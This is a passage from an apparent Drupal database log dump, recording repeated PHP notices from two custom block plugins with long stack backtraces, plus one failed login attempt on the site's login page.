/var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580452176),(4623,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7972:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580452176),(4624,0,'user','Login attempt failed from %ip.',_binary 'a:1:{s:3:\"%ip\";s:11:\"5.188.62.25\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580453416),(4625,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7980:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580453416),(4626,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7972:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): 